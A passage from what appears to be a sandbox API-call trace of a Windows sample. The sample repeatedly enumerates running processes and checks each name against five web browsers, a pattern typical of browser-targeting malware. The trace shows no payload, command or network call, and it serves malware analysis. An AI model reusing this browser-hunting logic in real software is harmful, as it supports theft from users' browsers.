lpString2="chrome.exe") returned 1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.615] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0205.616] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0205.616] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0205.616] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0205.616] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0205.616] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0205.616] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0205.663] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0205.663] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0205.663] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0205.663] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0205.664] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.664] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0205.664] CloseHandle (hObject=0xe8) returned 1 [0205.664] Sleep (dwMilliseconds=0x3e8) [0206.724] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0206.726] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.727] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0206.727] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0206.727] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0206.727] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0206.727] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0206.727] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.727] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0206.727] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0206.727] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0206.727] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0206.727] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0206.727] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.728] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0206.728] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0206.728] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0206.728] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0206.728] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.728] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.728] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0206.728] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0206.729] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0206.729] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0206.729] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.729] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0206.729] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0206.729] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0206.729] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0206.729] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.730] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0206.730] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0206.730] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0206.730] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0206.730] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.730] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0206.730] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0206.730] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0206.730] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0206.730] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.731] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0206.731] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0206.731] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0206.731] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0206.731] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.731] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0206.731] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0206.732] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0206.732] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0206.732] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0206.732] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0206.732] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0206.732] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0206.732] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0206.732] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.733] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.733] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.733] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.734] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.734] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.734] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.734] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.734] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.734] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.735] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.736] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0206.736] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0206.736] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0206.736] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0206.736] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.736] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.736] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.736] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.736] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.736] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.737] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.737] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.737] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.737] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.737] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.738] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0206.738] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0206.738] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0206.738] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0206.738] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.738] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.738] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0206.738] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0206.738] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0206.738] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0206.738] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.738] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.739] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0206.739] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0206.739] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0206.739] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0206.739] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.739] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.739] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.739] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.739] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.740] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.740] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0206.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0206.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0206.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0206.740] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0206.741] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0206.741] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0206.741] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0206.741] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0206.741] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0206.741] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0206.741] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0206.741] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0206.741] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0206.741] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0206.742] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0206.742] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0206.742] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0206.742] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0206.742] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.742] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0206.742] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0206.743] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0206.743] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0206.743] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0206.743] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0206.743] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0206.743] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0206.743] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0206.743] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0206.743] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0206.744] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0206.744] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0206.744] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0206.744] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0206.744] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0206.744] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0206.744] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0206.744] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0206.744] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0206.744] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0206.745] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0206.745] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0206.745] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0206.745] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0206.745] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.745] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0206.746] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0206.746] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0206.746] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0206.746] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0206.746] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0206.746] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0206.746] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0206.746] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0206.746] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0206.746] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0206.747] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0206.747] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0206.747] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0206.747] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0206.747] lstrcmpiA 